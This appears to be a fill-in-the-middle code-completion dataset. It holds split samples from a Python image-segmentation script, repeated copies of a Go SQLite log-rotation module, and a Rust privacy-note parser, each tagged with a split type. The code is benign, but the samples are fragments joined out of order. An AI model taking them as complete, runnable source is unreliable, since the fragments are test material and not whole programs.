resampled_mask = resampler.Execute(seg_list[i])
resampled_mask_data = sitk.GetArrayFromImage(resampled_mask)
seg.append(resampled_mask_data)
# # MAJORITY VOTING # #
for i in range(len(seg)):
for j in range(i + 1, len(seg)):
arr1 = np.transpose(np.nonzero(seg[i]))
arr2 = np.transpose(np.nonzero(seg[j]))
# Filling two lists
arr1list = [tuple(e) for e in arr1.tolist()]
arr2list = [tuple(e) for e in arr2.tolist()]
# Sorting both lists
arr1list.sort()
arr2list.sort()
# Creating necessary list & sorting
intersections = list(set(arr1list).intersection(arr2list))
intersections.sort()
image_list.append(intersections)
# Creating a list which contains the indexes of intersecting voxels
intersection_list = list(set(image_list[0]) | set(image_list[1]) | set(image_list[2]))
# Sorting the list
intersection_list.sort()
# Fetches array from image
image_array = sitk.GetArrayFromImage(common_img)
# Creates an array for the points and fills it using indexes
segmented_array = np.zeros(shape=image_array.shape, dtype=np.uint8)
for x, y, z in intersection_list:
segmented_array[x, y, z] = 1
return segmented_array
# # Similarity function # #
# --------------------------- #
# Calculates the following distances between images:
# 1. Jaccard coef.
# 2. Dice coef.
# 3. Hausdorff distance
# --------------------------- #
# --- Input --- #
# mask_img : The mask image [sikt-image]
# seg_img: The segmented image [sikt-image]
# --- Output --- #
# None
def distances(mask_img, seg_img):
# Creating the necessary filters
hausdorff = sitk.HausdorffDistanceImageFilter()
overlap = sitk.LabelOverlapMeasuresImageFilter()
|
# Fetching the distances and appending to distance list
# Jaccard coef.
jaccard = overlap.GetJaccardCoefficient()
# Dice coef.
dice = overlap.GetDiceCoefficient()
# Hausdorff distance
hausdorff_distance = hausdorff.GetHausdorffDistance()
# Printing out the distances for user
print('The Hausdorff distance: {}'.format(
hausdorff_distance))
print('The Dice coefficient: {}'.format(dice))
print('The Jaccard coefficient: {}'.format(jaccard))
return None
# # Classifier Function # #
# --------------------------- #
# Trains a random forest classifier by reading 2d images and comparing
# them to a vector which has labels that correspond to if it contains
# the pubic symphysis. The labels are binary.
# --------------------------- #
# --- Input --- #
# slice_list : List of 2D slice images [list]
# vector_list : List of vectors with binary labels [list]
# --- Output --- #
# trained_forest : Trained random forest classifier [sklearn.ensemble.forest.RandomForestClassifier]
def train_classifier(slice_list, vector_list):
# Creating necessary list
x_train_list = []
# Reading in input data
for image in slice_list:
# Fetching arrays
image_array = sitk.GetArrayFromImage(image)
# Resizing
image_array.resize((512, 512, 512))
for z in range(image_array.shape[2]):
x_train_list.append(image_array[:, :, z].flatten())
x_train = np.asarray(x_train_list, dtype=np.uint8)
# Reading in training labels
y_train = None
for i in range(0, len(vector_list)):
if i == 0:
y_train = vector_list[i]
else:
y_train = np.concatenate([y_train, vector_list[i]])
# Train classifier
trained_forest = RandomForestClassifier(n_estimators=15
|
# Execute filters
hausdorff.Execute(mask_img, seg_img)
overlap.Execute(mask_img, seg_img)
|
random_line_split
|
sqlite.go
|
// Ensure every transaction returns its connection via Commit() or Rollback()
// Note that Rows.Close() can be called multiple times safely,
// so do not fear calling it where it might not be necessary.
const (
backupDB = iota
rotateDB
)
const (
// create directory for sqlite db file due to sqlite sync by directory
backupDir = "sqlitedb"
rotateDir = "sqlitedb_rotate"
dbDSN = "file:%s?cache=%s&_journal=%s&_sync=OFF"
)
var journalMode = map[int]string{
DELETE: "delete",
TRUNCATE: "truncate",
PERSIST: "persist",
MEMORY: "memory",
WAL: "wal",
OFF: "off",
}
var cacheMode = map[int]string{
SHARED: "shared",
PRIVATE: "private",
}
var (
insertActorStart = `INSERT INTO actor(uuid, name, start_time) VALUES (:uuid, :name, :start_time) ;`
updateActorEnd = `UPDATE actor SET end_time = :end_time WHERE uuid = :uuid ;`
insertLog = `INSERT INTO log(time, message) VALUES (:time, :message) ;`
)
var (
ErrDbPathIsAFile = "%s is an existing file"
ErrDbClosed = errors.New("DB is closed")
)
var actor_schema = `
CREATE TABLE if not exists actor(
uuid text PRIMARY KEY,
name text,
start_time text,
end_time text
);
`
var log_schema = `
CREATE TABLE if not exists log(
seq INTEGER PRIMARY KEY ASC,
time text,
message text
);
`
// database ORM types
type (
message struct {
Msg string `json:"message"`
}
actor struct {
Uuid string `db:"uuid"`
Name string `db:"name"`
Stime string `db:"start_time"`
Etime string `db:"end_time"`
}
log struct {
Seq int `db:"seq"`
Time string `db:"time"`
Msg []byte `db:"message"`
}
)
// NewSqlite returns init. Sqlite instance
//
// ctx: context.Context
//
// name: actor name
//
// uuid: actor uuid
//
// jmode: journal mode
//
// cmode: cache mode
//
// rcnt: 0: no rotation, >0: preserve number of records then rotate.
func NewSqlite(
ctx context.Context, // caller's context
name string, // actor name
uuid string, // actor uuid
jmode int, // journal mode
cmode int, // cache mode
rcnt int, // rotate count
period int, // recycle period in seconds
) (*Sqlite, error) {
db, err := initDB(ctx, name, uuid, jmode, cmode, backupDB)
if err != nil {
l.Logger.Error(
"backup initDB error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.String("error", err.Error()),
)
return nil, err
}
if rcnt > 0 {
go rotate(ctx, name, uuid, db, rcnt, period)
}
return &Sqlite{
ctx: ctx,
name: name,
uuid: uuid,
journal: jmode,
cache: cmode,
rotate: rcnt,
db: db,
}, nil
}
func initDB(
ctx context.Context,
name, uuid string,
jmode, cmode int,
dbType int) (*sqlx.DB, error) {
var dbPath string
currentDir, _ := os.Getwd()
switch dbType {
case backupDB:
dbPath = path.Join(currentDir, backupDir)
case rotateDB:
dbPath = path.Join(currentDir, rotateDir)
default:
dbPath = path.Join(currentDir, backupDir)
}
if fi, err := os.Stat(dbPath); err != nil {
if err := os.Mkdir(dbPath, 0700); err != nil {
return nil, err
}
} else if !fi.IsDir() {
// dbPath is a file, not directory
return nil, fmt.Errorf(ErrDbPathIsAFile, dbPath)
}
var dbFile string
gpattern := `%s_%s_*.db`
rpattern := `%s_%s_(?P<SEQ>\d+).db`
switch dbType {
case backupDB:
dbFile = path.Join(dbPath, fmt.Sprintf("%s_%s.db", name, uuid))
case rotateDB:
dbFiles := path.Join(dbPath, fmt.Sprintf(gpattern, name, uuid))
if m, err := filepath.Glob(dbFiles); err != nil {
dbFile = path.Join(dbPath, fmt.Sprintf("%s_%s_1.db", name, uuid))
} else {
re, err := regexp.Compile(fmt.Sprintf(rpattern, name, uuid))
if err != nil {
return nil, err
}
maxCnt := 0
for idx := range m {
match := re.FindStringSubmatch(m[idx])
for i, name := range re.SubexpNames() {
if i != 0 && name == "SEQ" {
v, _ := strconv.Atoi(match[i])
maxCnt = max(v, maxCnt)
}
}
}
dbFile = path.Join(
dbPath, fmt.Sprintf("%s_%s_%d.db", name, uuid, maxCnt+1))
}
default:
dbFile = path.Join(dbPath, fmt.Sprintf("%s_%s.db", name, uuid))
}
dsn := fmt.Sprintf(dbDSN, dbFile, cacheMode[cmode], journalMode[jmode])
// Use open instead of MustOpen, which panics if can't open
// Use open instead of Connect since sqlite is local file
db, err := sqlx.Open(
"sqlite3",
dsn,
)
if err != nil {
return nil, err
}
// The connection is returned to the pool before every call's result
// is returned.
db.SetMaxOpenConns(1)
db.SetMaxIdleConns(1)
// sqlite Exec can't handle multi-statement, thus makes it different stmnt
db.MustExecContext(ctx, actor_schema)
db.MustExecContext(ctx, log_schema)
return db, nil
}
func max(x, y int) int {
if x < y {
return y
}
return x
}
func rotate(
ctx context.Context,
name, uuid string,
db *sqlx.DB,
rcnt, period int) {
c := time.Tick(time.Duration(period) * time.Second)
if c == nil {
l.Logger.Error(
"rotate error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.String("error", fmt.Sprintf(
"rotate period is invalid: %d", period)),
)
return
}
rating := make(chan struct{}, 1)
selectSql := `SELECT seq, time, message FROM log ORDER BY seq LIMIT ? ;`
deleteSql := `DELETE FROM log WHERE seq <= ? ;`
selectCnt := `SELECT COUNT(*) FROM log ;`
runner := func() {
defer func() {
<-rating
}()
var rowCnt int
tx, err := db.BeginTxx(ctx, nil)
if err != nil {
l.Logger.Error(
"backup db transaction error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.String("error", err.Error()),
)
return
}
cntRow := tx.QueryRowxContext(ctx, selectCnt)
cntRow.Scan(&rowCnt)
if rowCnt > rcnt {
rdb, err := initDB(ctx, name, uuid, DELETE, PRIVATE, rotateDB)
if err != nil {
l.Logger.Error(
"rotate initDB error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.String("error", err.Error()),
)
tx.Rollback()
return
}
defer rdb.Close()
rows, err := tx.QueryxContext(ctx, selectSql, rcnt)
if err != nil {
l.Logger.Error(
"backup db query error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.Int("row count", rcnt),
zap.String("error", err.Error()),
)
tx.Rollback()
return
}
defer rows.Close()
lastSeq := 0
for rows.Next() {
var ll log
if err := rows.StructScan(&ll); err != nil {
l.Logger.Error(
"backup db StructScan error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.String("error", err.Error()),
)
|
// To prevent this:
// Ensure you Scan() every Row object
// Ensure you either Close() or fully-iterate via Next() every Rows object
|
random_line_split
|
|
sqlite.go
|
message) ;`
)
var (
ErrDbPathIsAFile = "%s is an existing file"
ErrDbClosed = errors.New("DB is closed")
)
var actor_schema = `
CREATE TABLE if not exists actor(
uuid text PRIMARY KEY,
name text,
start_time text,
end_time text
);
`
var log_schema = `
CREATE TABLE if not exists log(
seq INTEGER PRIMARY KEY ASC,
time text,
message text
);
`
// database ORM types
type (
message struct {
Msg string `json:"message"`
}
actor struct {
Uuid string `db:"uuid"`
Name string `db:"name"`
Stime string `db:"start_time"`
Etime string `db:"end_time"`
}
log struct {
Seq int `db:"seq"`
Time string `db:"time"`
Msg []byte `db:"message"`
}
)
// NewSqlite returns init. Sqlite instance
//
// ctx: context.Context
//
// name: actor name
//
// uuid: actor uuid
//
// jmode: journal mode
//
// cmode: cache mode
//
// rcnt: 0: no rotation, >0: preserve number of records then rotate.
func NewSqlite(
ctx context.Context, // caller's context
name string, // actor name
uuid string, // actor uuid
jmode int, // journal mode
cmode int, // cache mode
rcnt int, // rotate count
period int, // recycle period in seconds
) (*Sqlite, error) {
db, err := initDB(ctx, name, uuid, jmode, cmode, backupDB)
if err != nil {
l.Logger.Error(
"backup initDB error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.String("error", err.Error()),
)
return nil, err
}
if rcnt > 0 {
go rotate(ctx, name, uuid, db, rcnt, period)
}
return &Sqlite{
ctx: ctx,
name: name,
uuid: uuid,
journal: jmode,
cache: cmode,
rotate: rcnt,
db: db,
}, nil
}
func initDB(
ctx context.Context,
name, uuid string,
jmode, cmode int,
dbType int) (*sqlx.DB, error) {
var dbPath string
currentDir, _ := os.Getwd()
switch dbType {
case backupDB:
dbPath = path.Join(currentDir, backupDir)
case rotateDB:
dbPath = path.Join(currentDir, rotateDir)
default:
dbPath = path.Join(currentDir, backupDir)
}
if fi, err := os.Stat(dbPath); err != nil {
if err := os.Mkdir(dbPath, 0700); err != nil {
return nil, err
}
} else if !fi.IsDir() {
// dbPath is a file, not directory
return nil, fmt.Errorf(ErrDbPathIsAFile, dbPath)
}
var dbFile string
gpattern := `%s_%s_*.db`
rpattern := `%s_%s_(?P<SEQ>\d+).db`
switch dbType {
case backupDB:
dbFile = path.Join(dbPath, fmt.Sprintf("%s_%s.db", name, uuid))
case rotateDB:
dbFiles := path.Join(dbPath, fmt.Sprintf(gpattern, name, uuid))
if m, err := filepath.Glob(dbFiles); err != nil {
dbFile = path.Join(dbPath, fmt.Sprintf("%s_%s_1.db", name, uuid))
} else {
re, err := regexp.Compile(fmt.Sprintf(rpattern, name, uuid))
if err != nil {
return nil, err
}
maxCnt := 0
for idx := range m {
match := re.FindStringSubmatch(m[idx])
for i, name := range re.SubexpNames() {
if i != 0 && name == "SEQ" {
v, _ := strconv.Atoi(match[i])
maxCnt = max(v, maxCnt)
}
}
}
dbFile = path.Join(
dbPath, fmt.Sprintf("%s_%s_%d.db", name, uuid, maxCnt+1))
}
default:
dbFile = path.Join(dbPath, fmt.Sprintf("%s_%s.db", name, uuid))
}
dsn := fmt.Sprintf(dbDSN, dbFile, cacheMode[cmode], journalMode[jmode])
// Use open instead of MustOpen, which panics if can't open
// Use open instead of Connect since sqlite is local file
db, err := sqlx.Open(
"sqlite3",
dsn,
)
if err != nil {
return nil, err
}
// The connection is returned to the pool before every call's result
// is returned.
db.SetMaxOpenConns(1)
db.SetMaxIdleConns(1)
// sqlite Exec can't handle multi-statement, thus makes it different stmnt
db.MustExecContext(ctx, actor_schema)
db.MustExecContext(ctx, log_schema)
return db, nil
}
func max(x, y int) int {
if x < y {
return y
}
return x
}
func rotate(
ctx context.Context,
name, uuid string,
db *sqlx.DB,
rcnt, period int) {
c := time.Tick(time.Duration(period) * time.Second)
if c == nil
|
rating := make(chan struct{}, 1)
selectSql := `SELECT seq, time, message FROM log ORDER BY seq LIMIT ? ;`
deleteSql := `DELETE FROM log WHERE seq <= ? ;`
selectCnt := `SELECT COUNT(*) FROM log ;`
runner := func() {
defer func() {
<-rating
}()
var rowCnt int
tx, err := db.BeginTxx(ctx, nil)
if err != nil {
l.Logger.Error(
"backup db transaction error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.String("error", err.Error()),
)
return
}
cntRow := tx.QueryRowxContext(ctx, selectCnt)
cntRow.Scan(&rowCnt)
if rowCnt > rcnt {
rdb, err := initDB(ctx, name, uuid, DELETE, PRIVATE, rotateDB)
if err != nil {
l.Logger.Error(
"rotate initDB error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.String("error", err.Error()),
)
tx.Rollback()
return
}
defer rdb.Close()
rows, err := tx.QueryxContext(ctx, selectSql, rcnt)
if err != nil {
l.Logger.Error(
"backup db query error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.Int("row count", rcnt),
zap.String("error", err.Error()),
)
tx.Rollback()
return
}
defer rows.Close()
lastSeq := 0
for rows.Next() {
var ll log
if err := rows.StructScan(&ll); err != nil {
l.Logger.Error(
"backup db StructScan error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.String("error", err.Error()),
)
tx.Rollback()
return
}
_, err := rdb.NamedExecContext(
ctx,
insertLog,
ll,
)
if err != nil {
l.Logger.Error(
"rotate db insert error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.String("error", err.Error()),
)
tx.Rollback()
return
}
lastSeq = ll.Seq
}
// Delete rotated data from backup DB
_, err = tx.ExecContext(
ctx,
deleteSql,
lastSeq,
)
if err != nil {
l.Logger.Error(
"backup db delete error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.String("error", err.Error()),
)
tx.Rollback()
return
}
}
if err := tx.Commit(); err != nil {
l.Logger.Error(
"backup db commit error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.String("error", err.Error()),
)
return
|
{
l.Logger.Error(
"rotate error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.String("error", fmt.Sprintf(
"rotate period is invalid: %d", period)),
)
return
}
|
conditional_block
|
sqlite.go
|
message) ;`
)
var (
ErrDbPathIsAFile = "%s is an existing file"
ErrDbClosed = errors.New("DB is closed")
)
var actor_schema = `
CREATE TABLE if not exists actor(
uuid text PRIMARY KEY,
name text,
start_time text,
end_time text
);
`
var log_schema = `
CREATE TABLE if not exists log(
seq INTEGER PRIMARY KEY ASC,
time text,
message text
);
`
// database ORM types
type (
message struct {
Msg string `json:"message"`
}
actor struct {
Uuid string `db:"uuid"`
Name string `db:"name"`
Stime string `db:"start_time"`
Etime string `db:"end_time"`
}
log struct {
Seq int `db:"seq"`
Time string `db:"time"`
Msg []byte `db:"message"`
}
)
// NewSqlite returns init. Sqlite instance
//
// ctx: context.Context
//
// name: actor name
//
// uuid: actor uuid
//
// jmode: journal mode
//
// cmode: cache mode
//
// rcnt: 0: no rotation, >0: preserve number of records then rotate.
func NewSqlite(
ctx context.Context, // caller's context
name string, // actor name
uuid string, // actor uuid
jmode int, // journal mode
cmode int, // cache mode
rcnt int, // rotate count
period int, // recycle period in seconds
) (*Sqlite, error) {
db, err := initDB(ctx, name, uuid, jmode, cmode, backupDB)
if err != nil {
l.Logger.Error(
"backup initDB error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.String("error", err.Error()),
)
return nil, err
}
if rcnt > 0 {
go rotate(ctx, name, uuid, db, rcnt, period)
}
return &Sqlite{
ctx: ctx,
name: name,
uuid: uuid,
journal: jmode,
cache: cmode,
rotate: rcnt,
db: db,
}, nil
}
func initDB(
ctx context.Context,
name, uuid string,
jmode, cmode int,
dbType int) (*sqlx.DB, error)
|
return nil, fmt.Errorf(ErrDbPathIsAFile, dbPath)
}
var dbFile string
gpattern := `%s_%s_*.db`
rpattern := `%s_%s_(?P<SEQ>\d+).db`
switch dbType {
case backupDB:
dbFile = path.Join(dbPath, fmt.Sprintf("%s_%s.db", name, uuid))
case rotateDB:
dbFiles := path.Join(dbPath, fmt.Sprintf(gpattern, name, uuid))
if m, err := filepath.Glob(dbFiles); err != nil {
dbFile = path.Join(dbPath, fmt.Sprintf("%s_%s_1.db", name, uuid))
} else {
re, err := regexp.Compile(fmt.Sprintf(rpattern, name, uuid))
if err != nil {
return nil, err
}
maxCnt := 0
for idx := range m {
match := re.FindStringSubmatch(m[idx])
for i, name := range re.SubexpNames() {
if i != 0 && name == "SEQ" {
v, _ := strconv.Atoi(match[i])
maxCnt = max(v, maxCnt)
}
}
}
dbFile = path.Join(
dbPath, fmt.Sprintf("%s_%s_%d.db", name, uuid, maxCnt+1))
}
default:
dbFile = path.Join(dbPath, fmt.Sprintf("%s_%s.db", name, uuid))
}
dsn := fmt.Sprintf(dbDSN, dbFile, cacheMode[cmode], journalMode[jmode])
// Use open instead of MustOpen, which panics if can't open
// Use open instead of Connect since sqlite is local file
db, err := sqlx.Open(
"sqlite3",
dsn,
)
if err != nil {
return nil, err
}
// The connection is returned to the pool before every call's result
// is returned.
db.SetMaxOpenConns(1)
db.SetMaxIdleConns(1)
// sqlite Exec can't handle multi-statement, thus makes it different stmnt
db.MustExecContext(ctx, actor_schema)
db.MustExecContext(ctx, log_schema)
return db, nil
}
func max(x, y int) int {
if x < y {
return y
}
return x
}
func rotate(
ctx context.Context,
name, uuid string,
db *sqlx.DB,
rcnt, period int) {
c := time.Tick(time.Duration(period) * time.Second)
if c == nil {
l.Logger.Error(
"rotate error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.String("error", fmt.Sprintf(
"rotate period is invalid: %d", period)),
)
return
}
rating := make(chan struct{}, 1)
selectSql := `SELECT seq, time, message FROM log ORDER BY seq LIMIT ? ;`
deleteSql := `DELETE FROM log WHERE seq <= ? ;`
selectCnt := `SELECT COUNT(*) FROM log ;`
runner := func() {
defer func() {
<-rating
}()
var rowCnt int
tx, err := db.BeginTxx(ctx, nil)
if err != nil {
l.Logger.Error(
"backup db transaction error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.String("error", err.Error()),
)
return
}
cntRow := tx.QueryRowxContext(ctx, selectCnt)
cntRow.Scan(&rowCnt)
if rowCnt > rcnt {
rdb, err := initDB(ctx, name, uuid, DELETE, PRIVATE, rotateDB)
if err != nil {
l.Logger.Error(
"rotate initDB error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.String("error", err.Error()),
)
tx.Rollback()
return
}
defer rdb.Close()
rows, err := tx.QueryxContext(ctx, selectSql, rcnt)
if err != nil {
l.Logger.Error(
"backup db query error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.Int("row count", rcnt),
zap.String("error", err.Error()),
)
tx.Rollback()
return
}
defer rows.Close()
lastSeq := 0
for rows.Next() {
var ll log
if err := rows.StructScan(&ll); err != nil {
l.Logger.Error(
"backup db StructScan error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.String("error", err.Error()),
)
tx.Rollback()
return
}
_, err := rdb.NamedExecContext(
ctx,
insertLog,
ll,
)
if err != nil {
l.Logger.Error(
"rotate db insert error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.String("error", err.Error()),
)
tx.Rollback()
return
}
lastSeq = ll.Seq
}
// Delete rotated data from backup DB
_, err = tx.ExecContext(
ctx,
deleteSql,
lastSeq,
)
if err != nil {
l.Logger.Error(
"backup db delete error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.String("error", err.Error()),
)
tx.Rollback()
return
}
}
if err := tx.Commit(); err != nil {
l.Logger.Error(
"backup db commit error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.String("error", err.Error()),
)
return
|
{
var dbPath string
currentDir, _ := os.Getwd()
switch dbType {
case backupDB:
dbPath = path.Join(currentDir, backupDir)
case rotateDB:
dbPath = path.Join(currentDir, rotateDir)
default:
dbPath = path.Join(currentDir, backupDir)
}
if fi, err := os.Stat(dbPath); err != nil {
if err := os.Mkdir(dbPath, 0700); err != nil {
return nil, err
}
} else if !fi.IsDir() {
// dbPath is a file, not directory
|
identifier_body
|
sqlite.go
|
seq INTEGER PRIMARY KEY ASC,
time text,
message text
);
`
// database ORM types
type (
message struct {
Msg string `json:"message"`
}
actor struct {
Uuid string `db:"uuid"`
Name string `db:"name"`
Stime string `db:"start_time"`
Etime string `db:"end_time"`
}
log struct {
Seq int `db:"seq"`
Time string `db:"time"`
Msg []byte `db:"message"`
}
)
// NewSqlite returns init. Sqlite instance
//
// ctx: context.Context
//
// name: actor name
//
// uuid: actor uuid
//
// jmode: journal mode
//
// cmode: cache mode
//
// rcnt: 0: no rotation, >0: preserve number of records then rotate.
func NewSqlite(
ctx context.Context, // caller's context
name string, // actor name
uuid string, // actor uuid
jmode int, // journal mode
cmode int, // cache mode
rcnt int, // rotate count
period int, // recycle period in seconds
) (*Sqlite, error) {
db, err := initDB(ctx, name, uuid, jmode, cmode, backupDB)
if err != nil {
l.Logger.Error(
"backup initDB error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.String("error", err.Error()),
)
return nil, err
}
if rcnt > 0 {
go rotate(ctx, name, uuid, db, rcnt, period)
}
return &Sqlite{
ctx: ctx,
name: name,
uuid: uuid,
journal: jmode,
cache: cmode,
rotate: rcnt,
db: db,
}, nil
}
func initDB(
ctx context.Context,
name, uuid string,
jmode, cmode int,
dbType int) (*sqlx.DB, error) {
var dbPath string
currentDir, _ := os.Getwd()
switch dbType {
case backupDB:
dbPath = path.Join(currentDir, backupDir)
case rotateDB:
dbPath = path.Join(currentDir, rotateDir)
default:
dbPath = path.Join(currentDir, backupDir)
}
if fi, err := os.Stat(dbPath); err != nil {
if err := os.Mkdir(dbPath, 0700); err != nil {
return nil, err
}
} else if !fi.IsDir() {
// dbPath is a file, not directory
return nil, fmt.Errorf(ErrDbPathIsAFile, dbPath)
}
var dbFile string
gpattern := `%s_%s_*.db`
rpattern := `%s_%s_(?P<SEQ>\d+).db`
switch dbType {
case backupDB:
dbFile = path.Join(dbPath, fmt.Sprintf("%s_%s.db", name, uuid))
case rotateDB:
dbFiles := path.Join(dbPath, fmt.Sprintf(gpattern, name, uuid))
if m, err := filepath.Glob(dbFiles); err != nil {
dbFile = path.Join(dbPath, fmt.Sprintf("%s_%s_1.db", name, uuid))
} else {
re, err := regexp.Compile(fmt.Sprintf(rpattern, name, uuid))
if err != nil {
return nil, err
}
maxCnt := 0
for idx := range m {
match := re.FindStringSubmatch(m[idx])
for i, name := range re.SubexpNames() {
if i != 0 && name == "SEQ" {
v, _ := strconv.Atoi(match[i])
maxCnt = max(v, maxCnt)
}
}
}
dbFile = path.Join(
dbPath, fmt.Sprintf("%s_%s_%d.db", name, uuid, maxCnt+1))
}
default:
dbFile = path.Join(dbPath, fmt.Sprintf("%s_%s.db", name, uuid))
}
dsn := fmt.Sprintf(dbDSN, dbFile, cacheMode[cmode], journalMode[jmode])
// Use open instead of MustOpen, which panics if can't open
// Use open instead of Connect since sqlite is local file
db, err := sqlx.Open(
"sqlite3",
dsn,
)
if err != nil {
return nil, err
}
// The connection is returned to the pool before every call's result
// is returned.
db.SetMaxOpenConns(1)
db.SetMaxIdleConns(1)
// sqlite Exec can't handle multi-statement, thus makes it different stmnt
db.MustExecContext(ctx, actor_schema)
db.MustExecContext(ctx, log_schema)
return db, nil
}
func max(x, y int) int {
if x < y {
return y
}
return x
}
func rotate(
ctx context.Context,
name, uuid string,
db *sqlx.DB,
rcnt, period int) {
c := time.Tick(time.Duration(period) * time.Second)
if c == nil {
l.Logger.Error(
"rotate error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.String("error", fmt.Sprintf(
"rotate period is invalid: %d", period)),
)
return
}
rating := make(chan struct{}, 1)
selectSql := `SELECT seq, time, message FROM log ORDER BY seq LIMIT ? ;`
deleteSql := `DELETE FROM log WHERE seq <= ? ;`
selectCnt := `SELECT COUNT(*) FROM log ;`
runner := func() {
defer func() {
<-rating
}()
var rowCnt int
tx, err := db.BeginTxx(ctx, nil)
if err != nil {
l.Logger.Error(
"backup db transaction error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.String("error", err.Error()),
)
return
}
cntRow := tx.QueryRowxContext(ctx, selectCnt)
cntRow.Scan(&rowCnt)
if rowCnt > rcnt {
rdb, err := initDB(ctx, name, uuid, DELETE, PRIVATE, rotateDB)
if err != nil {
l.Logger.Error(
"rotate initDB error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.String("error", err.Error()),
)
tx.Rollback()
return
}
defer rdb.Close()
rows, err := tx.QueryxContext(ctx, selectSql, rcnt)
if err != nil {
l.Logger.Error(
"backup db query error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.Int("row count", rcnt),
zap.String("error", err.Error()),
)
tx.Rollback()
return
}
defer rows.Close()
lastSeq := 0
for rows.Next() {
var ll log
if err := rows.StructScan(&ll); err != nil {
l.Logger.Error(
"backup db StructScan error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.String("error", err.Error()),
)
tx.Rollback()
return
}
_, err := rdb.NamedExecContext(
ctx,
insertLog,
ll,
)
if err != nil {
l.Logger.Error(
"rotate db insert error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.String("error", err.Error()),
)
tx.Rollback()
return
}
lastSeq = ll.Seq
}
// Delete rotated data from backup DB
_, err = tx.ExecContext(
ctx,
deleteSql,
lastSeq,
)
if err != nil {
l.Logger.Error(
"backup db delete error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.String("error", err.Error()),
)
tx.Rollback()
return
}
}
if err := tx.Commit(); err != nil {
l.Logger.Error(
"backup db commit error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.String("error", err.Error()),
)
return
}
}
for {
select {
case <-ctx.Done():
return
case <-c:
select {
case rating <- struct{}{}:
runner()
default:
}
}
}
}
func (s *Sqlite) Close() {
if s.db != nil {
s.db.Close()
}
}
func (s *Sqlite)
|
Insert
|
identifier_name
|
|
lib.rs
|
{
#[wasm_bindgen(skip)]
pub prefix: String,
pub version: NoteVersion,
#[wasm_bindgen(skip)]
pub token_symbol: String,
pub group_id: u32,
pub block_number: Option<u32>,
#[wasm_bindgen(skip)]
pub r: Scalar,
#[wasm_bindgen(skip)]
pub nullifier: Scalar,
}
#[wasm_bindgen]
pub struct ZkProof {
#[wasm_bindgen(skip)]
pub comms: Vec<CompressedRistretto>,
#[wasm_bindgen(skip)]
pub nullifier_hash: Scalar,
#[wasm_bindgen(skip)]
pub proof: Vec<u8>,
#[wasm_bindgen(skip)]
pub leaf_index_comms: Vec<CompressedRistretto>,
#[wasm_bindgen(skip)]
pub proof_comms: Vec<CompressedRistretto>,
}
impl fmt::Display for NoteVersion {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
match self {
NoteVersion::V1 => write!(f, "v1"),
}
}
}
impl FromStr for NoteVersion {
type Err = OpStatusCode;
fn from_str(s: &str) -> Result<Self, Self::Err> {
match s {
"v1" => Ok(NoteVersion::V1),
_ => Err(OpStatusCode::InvalidNoteVersion),
}
}
}
impl fmt::Display for Note {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
let encoded_r = hex::encode(&self.r.to_bytes());
let encoded_nullifier = hex::encode(&self.nullifier.to_bytes());
let mut parts = vec![
self.prefix.clone(),
self.version.to_string(),
self.token_symbol.clone(),
format!("{}", self.group_id),
];
if let Some(bn) = self.block_number {
parts.push(format!("{}", bn));
}
parts.push(format!("{}{}", encoded_r, encoded_nullifier));
let note = parts.join("-");
write!(f, "{}", note)
}
}
impl FromStr for Note {
type Err = OpStatusCode;
fn from_str(s: &str) -> Result<Self, Self::Err> {
let parts: Vec<&str> = s.split('-').collect();
let partial = parts.len() == 5;
let full = parts.len() == 6;
if !partial && !full {
return Err(OpStatusCode::InvalidNoteLength);
}
if parts[0] != NOTE_PREFIX {
return Err(OpStatusCode::InvalidNotePrefix);
}
let version: NoteVersion = parts[1].parse()?;
let token_symbol = parts[2].to_owned();
let group_id = parts[3].parse().map_err(|_| OpStatusCode::InvalidNoteId)?;
let (block_number, note_val) = match partial {
true => (None, parts[4]),
false =>
|
};
